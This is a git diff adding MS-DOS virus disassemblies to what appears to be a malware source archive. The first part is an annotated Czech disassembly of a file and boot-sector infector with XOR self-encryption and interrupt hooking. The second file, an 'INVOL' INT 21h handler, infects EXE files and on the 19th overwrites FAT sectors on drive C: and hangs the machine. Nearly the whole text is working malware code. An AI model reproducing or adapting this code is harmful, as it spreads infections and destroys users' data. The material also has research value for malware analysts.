+091D A3A60B MOV [0BA6],AX
+0920 A13200 MOV AX,[0032] ; CS
+0923 A3A80B MOV [0BA8],AX
+0926 A12000 MOV AX,[0020] ; pocet bloku
+0929 833E1E0000 CMP Word Ptr [001E],+00
+092E 7401 JZ 0931
+0930 48 DEC AX
+0931 F7266E00 MUL Word Ptr [006E]
+0935 03061E00 ADD AX,[001E] ; byte v poslednim bloku
+0939 83D200 ADC DX,+00
+093C 050F00 ADD AX,000F
+093F 83D200 ADC DX,+00
+0942 25F0FF AND AX,FFF0
+0945 A34400 MOV [0044],AX
+0948 89164600 MOV [0046],DX
+094C 050010 ADD AX,1000
+094F 83D200 ADC DX,+00
+0952 723A JB 098E
+0954 F7366E00 DIV Word Ptr [006E]
+0958 0BD2 OR DX,DX
+095A 7401 JZ 095D
+095C 40 INC AX
+095D A32000 MOV [0020],AX
+0960 89161E00 MOV [001E],DX
+0964 A14400 MOV AX,[0044]
+0967 8B164600 MOV DX,[0046]
+096B F7366C00 DIV Word Ptr [006C]
+096F 2B062400 SUB AX,[0024]
+0973 A33200 MOV [0032],AX
+0976 C7063000630B MOV Word Ptr [0030],0B63
+097C A32A00 MOV [002A],AX
+097F C7062C00FE0D MOV Word Ptr [002C],0DFE
+0985 33C9 XOR CX,CX
+0987 8BD1 MOV DX,CX
+0989 B80042 MOV AX,4200
+098C CD21 INT 21
+098E 720A JB 099A
+0990 B91C00 MOV CX,001C
+0993 BA1C00 MOV DX,001C
+0996 B440 MOV AH,40
+0998 CD21 INT 21
+099A 7211 JB 09AD
+099C 3BC1 CMP AX,CX
+099E 7533 JNZ 09D3
+09A0 8B164400 MOV DX,[0044]
+09A4 8B0E4600 MOV CX,[0046]
+09A8 B80042 MOV AX,4200
+09AB CD21 INT 21
+09AD 7224 JB 09D3
+09AF A10300 MOV AX,[0003]
+09B2 0C01 OR AL,01
+09B4 A20500 MOV [0005],AL
+09B7 C606480001 MOV Byte Ptr [0048],01
+09BC E86B00 CALL 0A2A
+09BF 33D2 XOR DX,DX
+09C1 B90010 MOV CX,1000
+09C4 B440 MOV AH,40
+09C6 CD21 INT 21
+09C8 E85F00 CALL 0A2A
+09CB C606480000 MOV Byte Ptr [0048],00
+09D0
E88500 CALL 0A58
+09D3 2E833E380000 CMP Word Ptr CS:[0038],+00
+09D9 7404 JZ 09DF
+09DB B449 MOV AH,49
+09DD CD21 INT 21
+09DF 2E833E0A00FF CMP Word Ptr CS:[000A],-01
+09E5 7431 JZ 0A18
+09E7 2E8B1E0A00 MOV BX,CS:[000A]
+09EC 2E8B160E00 MOV DX,CS:[000E]
+09F1 2E8B0E1000 MOV CX,CS:[0010]
+09F6 B80157 MOV AX,5701
+09F9 CD21 INT 21
+09FB B43E MOV AH,3E
+09FD CD21 INT 21
+09FF 2EC5160600 LDS DX,CS:[0006]
+0A04 2E8B0E0C00 MOV CX,CS:[000C]
+0A09 B80143 MOV AX,4301
+0A0C CD21 INT 21
+0A0E 2EC516230A LDS DX,CS:[0A23]
+0A13 B82425 MOV AX,2524
+0A16 CD21 INT 21
+0A18 07 POP ES
+0A19 1F POP DS
+0A1A 5F POP DI
+0A1B 5E POP SI
+0A1C 5A POP DX
+0A1D 59 POP CX
+0A1E 5B POP BX
+0A1F 58 POP AX
+0A20 E99FFC JMP 06C2
+
+0A23 BF0563 MOV DI,6305
+0A26 16 PUSH SS
+
+;===============================================================
+; Obsluha preruseni 24H
+;
+0A27 32C0 XOR AL,AL
+0A29 CF IRET
+
+;=====================================================================
+; KODOVACI PROCEDURA kodujeme od 51H o delce 262H.
+;
+0A2A 1E PUSH DS
+0A2B 06 PUSH ES
+0A2C 57 PUSH DI
+0A2D 56 PUSH SI
+0A2E 51 PUSH CX
+0A2F 50 PUSH AX
+0A30 0E PUSH CS
+0A31 07 POP ES
+0A32 0E PUSH CS
+0A33 1F POP DS
+0A34 BE5100 MOV SI,0051
+0A37 8BFE MOV DI,SI
+0A39 B96202 MOV CX,0262
+0A3C 8A260500 MOV AH,[0005]
+0A40 AC LODSB
+0A41 32C4 XOR AL,AH
+0A43 AA STOSB
+0A44 E2FA LOOP 0A40
+0A46 58 POP AX
+0A47 59 POP CX
+0A48 5E POP SI
+0A49 5F POP DI
+0A4A 07 POP ES
+0A4B 1F POP DS
+0A4C C3 RET
+
+0A4D 33C0 XOR AX,AX
+0A4F 8BD8 MOV BX,AX
+0A51 8BD0 MOV DX,AX
+0A53 8BF0 MOV SI,AX
+0A55 8BF8 MOV DI,AX
+0A57 C3 RET
+
+0A58 2EFE064900 INC Byte Ptr CS:[0049]
+0A5D C3 RET
+
+0A5E 1E PUSH DS
+0A5F 0E PUSH CS
+0A60 1F POP DS
+0A61 B400 MOV AH,00
+0A63 CD1A INT 1A
+0A65 8BDA MOV BX,DX
+0A67 CD1A INT 1A
+0A69 3BDA CMP BX,DX
+0A6B 74FA JZ 0A67
+0A6D 33F6 XOR SI,SI
+0A6F 8BDA MOV BX,DX
+0A71 CD1A INT 1A
+0A73 46 INC SI
+0A74 3BDA CMP BX,DX
+0A76 74F9 JZ 0A71
+0A78 8BDE MOV BX,SI
+0A7A D1E3 SHL BX,1
+0A7C 891E3A00 MOV [003A],BX
+0A80 C6063F0000 MOV Byte Ptr [003F],00
+0A85 C606480000 MOV Byte Ptr [0048],00
+0A8A E440 IN AL,40
+0A8C 8AE0 MOV AH,AL
+0A8E E440 IN AL,40
+0A90 8AC4 MOV AL,AH
+0A92 2E32060500 XOR AL,CS:[0005]
+0A97 3C1F CMP AL,1F
+0A99 7705 JA 0AA0
+0A9B C6063F0001 MOV Byte Ptr [003F],01
+0AA0 C70603000100 MOV Word Ptr [0003],0001
+0AA6 C7064B000000 MOV Word Ptr [004B],0000
+0AAC C6064A0001 MOV Byte Ptr [004A],01
+0AB1 C6063E0000 MOV Byte Ptr [003E],00
+0AB6 C606730F00 MOV Byte Ptr [0F73],00
+0ABB 90 NOP
+0ABC 1F POP DS
+0ABD C3 RET
+
+;=====================================================================
+;
+;
+-10:0BBE 1E PUSH DS
+-10:0BBF 06 PUSH ES
+-10:0BC0 33C0 XOR AX,AX
+-10:0BC2 8ED8 MOV DS,AX
+-10:0BC4 A11304 MOV AX,[0413] ; velikost pammeti v KB
+-10:0BC7 B106 MOV CL,06 ; prepocet na paragrafy
+-10:0BC9 D3E0 SHL AX,CL
+-10:0BCB 8ED8 MOV DS,AX
+-10:0BCD 33F6 XOR SI,SI ; Na konci pameti hledame
+-10:0BCF 8B443E MOV AX,[SI+3E] ; zda je virus pritommny.
+-10:0BD2 3DCB3C CMP AX,3CCB +-10:0BD5 7434 JZ 0C0B ; +-10:0BD7 833E400EFE CMP Word Ptr [0E40],-02 +-10:0BDC 7403 JZ 0BE1 +-10:0BDE EB4E JMP 0C2E +-10:0BE0 90 NOP +-10:0BE1 FA CLI +-10:0BE2 B3FF MOV BL,FF +-10:0BE4 B84342 MOV AX,4243 +-10:0BE7 CD21 INT 21 +-10:0BE9 3D7856 CMP AX,5678 +-10:0BEC 741A JZ 0C08 +-10:0BEE C606740F01 MOV Byte Ptr [0F74],01 +-10:0BF3 90 NOP +-10:0BF4 FB STI +-10:0BF5 B82135 MOV AX,3521 +-10:0BF8 CD21 INT 21 +-10:0BFA 891EC506 MOV [06C5],BX +-10:0BFE 8C06C706 MOV [06C7],ES +-10:0C02 BA9A06 MOV DX,069A +-10:0C05 B82125 MOV AX,2521 +-10:0C08 EB24 JMP 0C2E +-10:0C0A 90 NOP +-10:0C0B C7443EFEFF MOV Word Ptr [SI+3E],FFFE +-10:0C10 33C0 XOR AX,AX +-10:0C12 8ED8 MOV DS,AX +-10:0C14 8EC0 MOV ES,AX +-10:0C16 BE0402 MOV SI,0204 +-10:0C19 BF2000 MOV DI,0020 +-10:0C1C B90200 MOV CX,0002 +-10:0C1F FA CLI +-10:0C20 F3 A5 REPZ MOVSW +-10:0C22 FB STI +-10:0C23 BE0C02 MOV SI,020C +-10:0C26 BF4C00 MOV DI,004C +-10:0C29 B90200 MOV CX,0002 +-10:0C2C F3 A5 REPZ MOVSW +-10:0C2E 07 POP ES +-10:0C2F 1F POP DS +-10:0C30 C3 RET + +;--------------------------------------------------------------------- +; pocatek viru pro COM +; +-10:0C31 E88AFF CALL 0BBE +-10:0C34 B3FF MOV BL,FF +-10:0C36 B84342 MOV AX,4243 +-10:0C39 CD21 INT 21 +-10:0C3B 3D7856 CMP AX,5678 +-10:0C3E 7513 JNZ 0C53 +-10:0C40 B84442 MOV AX,4244 +-10:0C43 BF0001 MOV DI,0100 +-10:0C46 2E8B8D1400 MOV CX,CS:[DI+0014] +-10:0C4B BE0010 MOV SI,1000 +-10:0C4E 03F7 ADD SI,DI +-10:0C50 FC CLD +-10:0C51 CD21 INT 21 +-10:0C53 8CCB MOV BX,CS +-10:0C55 83C310 ADD BX,+10 +-10:0C58 8ED3 MOV SS,BX +-10:0C5A BCEE0D MOV SP,0DEE +-10:0C5D 53 PUSH BX +-10:0C5E BB630B MOV BX,0B63 +-10:0C61 53 PUSH BX +-10:0C62 CB RETF + +;--------------------------------------------------------------------- +; ZDE POKRACUJEME PO RETF (C62) + pocatek pro EXE +; +AX=0006 BX=0B63 CX=1006 DX=0000 SP=0DEE BP=0000 SI=0000 DI=0000 +DS=48C5 ES=48C5 SS=CS CS=CS IP=0B63 NV UP EI PL NZ NA PO NC + +0B63 FC CLD +0B64 06 PUSH ES +0B65 E856FF CALL 0ABE 
(procedura BBE)
+0B68 2E8C061600 MOV CS:[0016],ES
+0B6D 2E8C067400 MOV CS:[0074],ES
+0B72 2E8C067800 MOV CS:[0078],ES
+0B77 2E8C067C00 MOV CS:[007C],ES
+0B7C 8CC3 MOV BX,ES
+0B7E 83C310 ADD BX,+10
+0B81 2E011EA80B ADD CS:[0BA8],BX
+0B86 2E011E4200 ADD CS:[0042],BX
+0B8B B3FF MOV BL,FF
+0B8D B84342 MOV AX,4243
+0B90 CD21 INT 21
+0B92 3D7856 CMP AX,5678
+0B95 7513 JNZ 0BAA
+0B97 07 POP ES
+0B98 2E8E164200 MOV SS,CS:[0042]
+0B9D 2E8B264000 MOV SP,CS:[0040]
+0BA2 E8A8FE CALL 0A4D
+0BA5 EA20202020 JMP 2020:2020
+0BAA E87DFE CALL 0A2A
+0BAD E8AEFE CALL 0A5E
+0BB0 33C0 XOR AX,AX
+0BB2 8EC0 MOV ES,AX
+0BB4 26A1F003 MOV AX,ES:[03F0]
+0BB8 2EA31800 MOV CS:[0018],AX
+0BBC 26A0F203 MOV AL,ES:[03F2]
+0BC0 2EA21A00 MOV CS:[001A],AL
+0BC4 26C706F003F3A5 MOV Word Ptr ES:[03F0],A5F3 ; 0:3F0 F3 A5 REPZ MOVSW
+0BCB 26C606F203CB MOV Byte Ptr ES:[03F2],CB ; 0:3F2 CB RETF
+0BD1 58 POP AX
+0BD2 051000 ADD AX,0010
+0BD5 8EC0 MOV ES,AX
+0BD7 0E PUSH CS
+0BD8 1F POP DS
+0BD9 B90010 MOV CX,1000
+0BDC D1E9 SHR CX,1
+0BDE 33F6 XOR SI,SI
+0BE0 8BFE MOV DI,SI
+0BE2 06 PUSH ES
+0BE3 B8EC0B MOV AX,0BEC
+0BE6 50 PUSH AX
+0BE7 EAF0030000 JMP 0000:03F0
+
+AX=0BEC BX=0E1A CX=0800 DX=2D4C SP=0DEA BP=0000 SI=0000 DI=0000
+DS= CS ES= CS SS= CS CS= CS IP=0BE7 NV UP EI PL ZR NA PE NC
+;---------------------------------------------------------------------
+0BEC 8CC8 MOV AX,CS
+0BEE 8ED0 MOV SS,AX
+0BF0 BCEE0D MOV SP,0DEE
+0BF3 33C0 XOR AX,AX
+0BF5 8ED8 MOV DS,AX
+0BF7 2EA11800 MOV AX,CS:[0018]
+0BFB A3F003 MOV [03F0],AX
+0BFE 2EA01A00 MOV AL,CS:[001A]
+0C02 A2F203 MOV [03F2],AL
+0C05 BB0010 MOV BX,1000
+0C08 B104 MOV CL,04
+0C0A D3EB SHR BX,CL
+0C0C 83C340 ADD BX,+40
+0C0F B44A MOV AH,4A ; modifikuj alokovanou pamet
+0C11 2E8E061600 MOV ES,CS:[0016]
+0C16 CD21 INT 21
+0C18 B82135 MOV AX,3521
+0C1B CD21 INT 21
+0C1D 2E891EC506 MOV CS:[06C5],BX
+0C22 2E8C06C706 MOV CS:[06C7],ES
+0C27 0E PUSH CS
+0C28 1F POP DS
+0C29 BA9A06 MOV DX,069A
+0C2C B82125 MOV AX,2521
+0C2F CD21 INT 21
+0C31 8E061600 MOV ES,[0016]
+0C35 268E062C00 MOV ES,ES:[002C]
+0C3A 33FF XOR DI,DI
+0C3C B9FF7F MOV CX,7FFF
+0C3F 32C0 XOR AL,AL
+0C41 F2AE REPNZ SCASB
+0C43 263805 CMP ES:[DI],AL
+0C46 E0F9 LOOPNZ 0C41
+0C48 8BD7 MOV DX,DI
+0C4A 83C203 ADD DX,+03
+0C4D B8004B MOV AX,4B00
+0C50 06 PUSH ES
+0C51 1F POP DS
+0C52 0E PUSH CS
+0C53 07 POP ES
+0C54 BB7000 MOV BX,0070
+0C57 1E PUSH DS
+0C58 06 PUSH ES
+0C59 50 PUSH AX
+0C5A 53 PUSH BX
+0C5B 51 PUSH CX
+0C5C 52 PUSH DX
+0C5D 0E PUSH CS
+0C5E 1F POP DS
+0C5F B80835 MOV AX,3508
+0C62 CD21 INT 21
+0C64 891ED902 MOV [02D9],BX
+0C68 8C06DB02 MOV [02DB],ES
+0C6C BAB302 MOV DX,02B3
+0C6F B80825 MOV AX,2508
+0C72 CD21 INT 21
+0C74 B80935 MOV AX,3509
+0C77 CD21 INT 21
+0C79 891EBA03 MOV [03BA],BX
+0C7D 8C06BC03 MOV [03BC],ES
+0C81 BA7303 MOV DX,0373
+0C84 B80925 MOV AX,2509
+0C87 CD21 INT 21
+0C89 B81335 MOV AX,3513
+0C8C CD21 INT 21
+0C8E 891E3406 MOV [0634],BX
+0C92 8C063606 MOV [0636],ES
+0C96 BAF004 MOV DX,04F0
+0C99 B81325 MOV AX,2513
+0C9C CD21 INT 21
+0C9E 5A POP DX
+0C9F 59 POP CX
+0CA0 5B POP BX
+0CA1 58 POP AX
+0CA2 07 POP ES
+0CA3 1F POP DS
+0CA4 9C PUSHF
+0CA5 2EFF1EC506 CALL FAR CS:[06C5]
+0CAA 1E PUSH DS
+0CAB 07 POP ES
+0CAC B449 MOV AH,49
+0CAE CD21 INT 21
+0CB0 B44D MOV AH,4D
+0CB2 CD21 INT 21
+0CB4 B431 MOV AH,31
+0CB6 BA0010 MOV DX,1000
+0CB9 B104 MOV CL,04
+0CBB D3EA SHR DX,CL
+0CBD 83C240 ADD DX,+40
+0CC0 CD21 INT 21
+
+0CC0 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+0CD0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+ .
+ .
+ .
+0DB0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+0DC0 00 00 00 00 00 00 F0 0C-FF 48 C5 48 57 18 06 00 ......p..HEHW...
+0DD0 C5 48 00 00 00 00 C5 48-D5 48 00 00 EC 0B 59 09 EH....EHUH..l.Y.
+0DE0 EC 0B 00 00 EC 0B 00 00-EC 0B D5 48 C0 3F 40 00 l...l...l.UH@?@.
+0DF0 F5 19 73 0A F5 19 46 02-22 15 EC 0B 32 15 00 00 u.s.u.F.".l.2...
+
+;===========================================================================
+; BOOT virus
+;
+0000 E99C00 JMP 009F
+
+0000 E9 9C 00 4D 53 44 4F 53-34 2E 30 00 02 01 01 00 i..MSDOS4.0.....
+0010 02 E0 00 40 0B F0 09 00-12 00 02 00 00 00 00 00 .`.@.p..........
+0020 00 00 00 00 00 00 29 DC-49 4F 20 20 20 20 20 20 ......)\IO
+0030 53 59 53 4D 53 44 4F 53-20 20 20 53 59 53 CB 3C SYSMSDOS SYSK<
+0040 FE FF FE FF 07 00 80 00-4E 6F 6E 2D 73 79 73 74 ~.~.....Non-syst
+0050 65 6D 20 64 69 73 6B 20-6F 72 20 64 69 73 6B 20 em disk or disk
+0060 65 72 72 6F 72 2E 0A 0D-52 65 70 6C 61 63 65 20 error...Replace
+0070 61 6E 64 20 73 74 72 69-6B 65 20 61 6E 79 20 6B and strike any k
+0080 65 79 20 77 68 65 6E 20-72 65 61 64 79 44 69 73 ey when readyDis
+0090 6B 20 62 6F 6F 74 20 66-61 69 6C 75 72 65 2E k boot failure.
+
+009F B8006E MOV AX,6E00
+00A2 B104 MOV CL,04
+00A4 D3E8 SHR AX,CL
+00A6 8CC9 MOV CX,CS
+00A8 03C1 ADD AX,CX
+00AA 8ED8 MOV DS,AX
+00AC 8EC0 MOV ES,AX
+00AE 8ED1 MOV SS,CX
+00B0 BCF0FF MOV SP,FFF0
+00B3 1E PUSH DS
+00B4 B8B90E MOV AX,0EB9
+00B7 50 PUSH AX
+00B8 CB RETF
+
+;=======================================================================
+; pokracovani po RETF - kod souvisly, zmena CS
+;
+0EB9 8816460E MOV [0E46],DL
+0EBD 33C0 XOR AX,AX
+0EBF 8ED8 MOV DS,AX
+0EC1 A11304 MOV AX,[0413] ; velikost pameti v kB
+0EC4 B106 MOV CL,06
+0EC6 D3E0 SHL AX,CL
+0EC8 8ED8 MOV DS,AX ; prepocet na paragrafy
+0ECA 833E400EFE CMP Word Ptr [0E40],-02
+0ECF 751A JNZ 0EEB
+0ED1 B8520F MOV AX,0F52
+0ED4 1E PUSH DS
+0ED5 50 PUSH AX
+0ED6 1E PUSH DS
+0ED7 07 POP ES
+0ED8 BF000E MOV DI,0E00
+0EDB 33C0 XOR AX,AX
+0EDD 8ED8 MOV DS,AX
+0EDF BE007C MOV SI,7C00
+0EE2 B94000 MOV CX,0040
+0EE5 FA CLI
+0EE6 FC CLD
+0EE7 F3A4 REPZ MOVSB
+0EE9 FB STI
+0EEA CB RETF
+
+0EEB 33C0 XOR AX,AX
+0EED 8ED8 MOV DS,AX
+0EEF A11304 MOV AX,[0413]
+0EF2 2D0500 SUB AX,0005
+0EF5 A31304 MOV [0413],AX
+0EF8 B106 MOV CL,06
+0EFA D3E0 SHL AX,CL
+0EFC 8ED8 MOV DS,AX
+0EFE 8EC0 MOV ES,AX
+0F00 2E8B16460E MOV
DX,CS:[0E46]
+0F05 33DB XOR BX,BX
+0F07 2E8B0E440E MOV CX,CS:[0E44]
+0F0C B80802 MOV AX,0208
+0F0F E8C800 CALL 0FDA
+0F12 1E PUSH DS
+0F13 B8180F MOV AX,0F18
+0F16 50 PUSH AX
+0F17 CB RETF
+
+0F18 8816460E MOV [0E46],DL
+0F1C 33C0 XOR AX,AX
+0F1E 8ED8 MOV DS,AX
+0F20 0E PUSH CS
+0F21 07 POP ES
+0F22 E839FB CALL 0A5E
+0F25 2EC606740F00 MOV Byte Ptr CS:[0F74],00
+0F2B 90 NOP
+0F2C 8CC9 MOV CX,CS
+0F2E BFD902 MOV DI,02D9 ; definice preruseni 8
+0F31 BE2000 MOV SI,0020
+0F34 BA750F MOV DX,0F75
+0F37 E88500 CALL 0FBF
+0F3A BE2400 MOV SI,0024 ; definice preruseni 9
+0F3D BFBA03 MOV DI,03BA
+0F40 BA7303 MOV DX,0373
+0F43 E87900 CALL 0FBF
+0F46 BE4C00 MOV SI,004C ; definice preruseni 13
+0F49 BF3406 MOV DI,0634
+0F4C BAF004 MOV DX,04F0
+0F4F E86D00 CALL 0FBF
+0F52 1E PUSH DS
+0F53 07 POP ES
+0F54 C7068400FFFF MOV Word Ptr [0084],FFFF
+0F5A BB007C MOV BX,7C00
+0F5D 2E8B0E440E MOV CX,CS:[0E44]
+0F62 80C108 ADD CL,08
+0F65 2E8B16460E MOV DX,CS:[0E46]
+0F6A B80102 MOV AX,0201
+0F6D E86A00 CALL 0FDA
+0F70 1E PUSH DS
+0F71 53 PUSH BX
+0F72 CB RETF
+
+0F73 00 01
+
+0F75 FA CLI
+0F76 2E803E740F00 CMP Byte Ptr CS:[0F74],00
+0F7C 7404 JZ 0F82
+0F7E E932F3 JMP 02B3
+
+0F82 1E PUSH DS
+0F83 06 PUSH ES
+0F84 50 PUSH AX
+0F85 53 PUSH BX
+0F86 51 PUSH CX
+0F87 52 PUSH DX
+0F88 56 PUSH SI
+0F89 57 PUSH DI
+0F8A 33C0 XOR AX,AX
+0F8C 8ED8 MOV DS,AX
+0F8E A18400 MOV AX,[0084]
+0F91 3DFFFF CMP AX,FFFF
+0F94 741E JZ 0FB4
+0F96 2E8006730F02 ADD Byte Ptr CS:[0F73],02
+0F9C 7316 JNB 0FB4
+0F9E 2EC606740F01 MOV Byte Ptr CS:[0F74],01
+0FA4 0E PUSH CS
+0FA5 07 POP ES
+0FA6 BE8400 MOV SI,0084
+0FA9 BFC506 MOV DI,06C5
+0FAC 8CC9 MOV CX,CS
+0FAE BA9A06 MOV DX,069A
+0FB1 E80B00 CALL 0FBF
+0FB4 5F POP DI
+0FB5 5E POP SI
+0FB6 5A POP DX
+0FB7 59 POP CX
+0FB8 5B POP BX
+0FB9 58 POP AX
+0FBA 07 POP ES
+0FBB 1F POP DS
+0FBC E919F3 JMP 02D8
+
+0FBF 1E PUSH DS
+0FC0 50 PUSH AX
+0FC1 33C0 XOR AX,AX
+0FC3 8ED8 MOV DS,AX
+0FC5 58 POP AX
+0FC6 51 PUSH CX
+0FC7 FC CLD
+0FC8 B90200 MOV CX,0002
+0FCB F3A5 REPZ MOVSW
+0FCD 59 POP CX
+0FCE 83EE04 SUB SI,+04
+0FD1 FA CLI
+0FD2 8914 MOV [SI],DX
+0FD4 894C02 MOV [SI+02],CX
+0FD7 FB STI
+0FD8 1F POP DS
+0FD9 C3 RET
+
+0FDA 56 PUSH SI
+0FDB 8BF0 MOV SI,AX
+0FDD CD13 INT 13
+0FDF 7308 JNB 0FE9
+0FE1 B400 MOV AH,00
+0FE3 CD13 INT 13
+0FE5 8BC6 MOV AX,SI
+0FE7 EBF4 JMP 0FDD
+0FE9 5E POP SI
+0FEA C3 RET
+
+0FE0 08 B4 00 CD 13 8B C6 EB-F4 5E C3 00 00 00 00 00 .4.M..Fkt^C.....
+0FF0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 55 AA ..............U*
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.invol.asm b/MSDOS/Virus.MSDOS.Unknown.invol.asm
new file mode 100644
index 00000000..98822dc8
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.invol.asm
@@ -0,0 +1,563 @@
+; INVOL-A INT 21h handler Aug 26, 1992
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+
+0b59:0014 3d 00 4b cmp ax,4b00
+0b59:0017 74 03 jz 001c
+0b59:0019 e9 7b 02 jmp ORIGINAL_21h (0297)
+
+0b59:001c 50 push ax
+0b59:001d 53 push bx
+0b59:001e 52 push dx
+0b59:001f 1e push ds
+0b59:0020 06 push es
+0b59:0021 b8 02 3d mov ax,3d02
+0b59:0024 cd 21 int 21
+0b59:0026 73 03 jae 002b
+0b59:0028 e9 67 02 jmp 0292
+0b59:002b 8b d8 mov bx,ax
+0b59:002d 8c c8 mov ax,cs
+0b59:002f 8e d8 mov ds,ax
+0b59:0031 b4 3f mov ah,3f
+0b59:0033 b9 18 00 mov cx,0018
+0b59:0036 ba 70 05 mov dx,0570
+0b59:0039 cd 21 int 21
+0b59:003b 72 4d jb 008a
+0b59:003d 81 3e 70 05 4d
+ 5a cmp word [0570],5a4d
+0b59:0043 75 45 jnz 008a
+0b59:0045 b4 00 mov ah,00
+0b59:0047 cd 1a int 1a
+0b59:0049 89 16 9d 02 mov [029d],dx
+0b59:004d b8 02 42 mov ax,4202
+0b59:0050 b9 00 00 mov cx,0000
+0b59:0053 ba 00 00 mov dx,0000
+0b59:0056 cd 21 int 21
+0b59:0058 72 30 jb 008a
+0b59:005a 89 16 6c 05 mov [056c],dx
+0b59:005e a3 6e 05 mov [056e],ax
+0b59:0061 2d 02 00 sub ax,0002
+0b59:0064 83 da 00 sbb dx,00
+0b59:0067 8b ca mov cx,dx
+0b59:0069 8b d0 mov dx,ax
+0b59:006b b8 00 42 mov ax,4200
+0b59:006e cd 21 int 21
+0b59:0070 72 18 jb 008a
+0b59:0072 b9 02 00 mov cx,0002
+0b59:0075 ba 88 05 mov dx,0588
+0b59:0078 b4 3f mov ah,3f
+0b59:007a cd 21 int 21
+0b59:007c 72 0c jb 008a
+0b59:007e a1 82 05 mov ax,[0582]
+0b59:0081 33 06 88 05 xor ax,[0588]
+0b59:0085 3d 4a 4c cmp ax,4c4a
+0b59:0088 75 03 jnz 008d
+0b59:008a e9 01 02 jmp 028e
+0b59:008d b4 2a mov ah,2a
+0b59:008f cd 21 int 21
+0b59:0091 80 fa 13 cmp dl,13
+0b59:0094 74 03 jz DO_DAMAGE (0099)
+0b59:0096 e9 b7 00 jmp 0150
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+DO_DAMAGE:
+
+; first display the message below
+
+0b59:0099 b8 02 00 mov ax,0002
+0b59:009c cd 10 int 10
+0b59:009e ba b1 00 mov dx,00b1
+0b59:00a1 b4 09 mov ah,09
+0b59:00a3 cd 21 int 21
+
+; then overwrite the first 10
sectors of FAT-1 on C: drive
+
+0b59:00a5 b0 02 mov al,02
+0b59:00a7 b9 0a 00 mov cx,000a
+0b59:00aa ba 01 00 mov dx,0001
+0b59:00ad cd 26 int 26
+
+; Hang the machine
+
+0b59:00af eb fe jmp 00af
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+0b59:00b1 59 6f 75 20 68 61 76 65 |You have|
+0b59:00b9 20 68 65 6c 70 65 64 20 | helped |
+0b59:00c1 73 70 72 65 61 64 20 74 |spread t|
+0b59:00c9 68 69 73 20 76 69 72 75 |his viru|
+0b59:00d1 73 2e 0d 0a 54 68 69 73 |s...This|
+0b59:00d9 20 68 61 73 20 62 65 65 | has bee|
+0b59:00e1 6e 20 61 20 6d 65 73 73 |n a mess|
+0b59:00e9 61 67 65 20 66 72 6f 6d |age from|
+0b59:00f1 20 79 6f 75 72 20 66 72 | your fr|
+0b59:00f9 69 65 6e 64 6c 79 0d 0a |iendly..|
+0b59:0101 6e 65 69 67 68 62 6f 72 |neighbor|
+0b59:0109 68 6f 6f 64 20 69 6e 66 |hood inf|
+0b59:0111 65 63 74 69 6f 6e 20 73 |ection s|
+0b59:0119 65 72 76 69 63 65 2e 0d |ervice..|
+0b59:0121 0a 54 68 61 6e 6b 20 79 |.Thank y|
+0b59:0129 6f 75 20 66 6f 72 20 79 |ou for y|
+0b59:0131 6f 75 72 20 69 6e 76 6f |our invo|
+0b59:0139 6c 75 6e 74 61 72 79 20 |luntary |
+0b59:0141 63 6f 6f 70 65 72 61 74 |cooperat|
+0b59:0149 69 6f 6e 2e 0d 0a 24 |ion...$|
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+0b59:0150 a1 6e 05 mov ax,[056e]
+0b59:0153 25 0f 00 and ax,000f
+0b59:0156 75 0a jnz 0162
+0b59:0158 8b 16 6c 05 mov dx,[056c]
+0b59:015c a1 6e 05 mov ax,[056e]
+0b59:015f eb 1d jmp 017e
+0b59:0161 90 nop
+
+0b59:0162 b2 10 mov dl,10
+0b59:0164 2a d0 sub dl,al
+0b59:0166 b6 00 mov dh,00
+0b59:0168 01 16 6e 05 add [056e],dx
+0b59:016c 83 16 6c 05 00 adc word [056c],00
+0b59:0171 b9 00 00 mov cx,0000
+0b59:0174 b8 02 42 mov ax,4202
+0b59:0177 cd 21 int 21
+0b59:0179 73 03 jae 017e
+0b59:017b e9 10 01 jmp 028e
+
+0b59:017e b9 04 00 mov cx,0004
+
+0b59:0181 d1 ea shr dx,1
+0b59:0183 d1 d8 rcr ax,1
+0b59:0185 e2 fa loop 0181
+
+0b59:0187 2b 06 78 05 sub ax,[0578]
+0b59:018b 01 06 7a 05 add [057a],ax
+0b59:018f 8b 16 86 05 mov
dx,[0586]
+0b59:0193 89 16 a6 04 mov [04a6],dx
+0b59:0197 8b 16 84 05 mov dx,[0584]
+0b59:019b 89 16 a4 04 mov [04a4],dx
+0b59:019f 8b 16 7e 05 mov dx,[057e]
+0b59:01a3 89 16 9b 04 mov [049b],dx
+0b59:01a7 8b 16 80 05 mov dx,[0580]
+0b59:01ab 89 16 a0 04 mov [04a0],dx
+0b59:01af a3 86 05 mov [0586],ax
+0b59:01b2 c7 06 84 05 58 05 mov word [0584],0558
+0b59:01b8 05 5f 00 add ax,005f
+0b59:01bb a3 7e 05 mov [057e],ax
+0b59:01be c7 06 80 05 00 01 mov word [0580],0100
+0b59:01c4 a1 9d 02 mov ax,[029d]
+0b59:01c7 a3 82 05 mov [0582],ax
+0b59:01ca be 14 00 mov si,0014
+0b59:01cd 8c df mov di,ds
+0b59:01cf 8e c7 mov es,di
+0b59:01d1 bf 88 05 mov di,0588
+0b59:01d4 b9 ac 02 mov cx,02ac
+0b59:01d7 8b 16 9d 02 mov dx,[029d]
+
+0b59:01db fc cld
+0b59:01dc ad lodsw
+0b59:01dd 33 c2 xor ax,dx
+0b59:01df ab stosw
+0b59:01e0 e2 fa loop 01dc
+
+0b59:01e2 be 9c 02 mov si,029c
+0b59:01e5 d1 ea shr dx,1
+0b59:01e7 73 04 jae 01ed
+0b59:01e9 c6 05 90 mov byte [di],90
+0b59:01ec 47 inc di
+0b59:01ed a5 movs
+0b59:01ee a5 movs
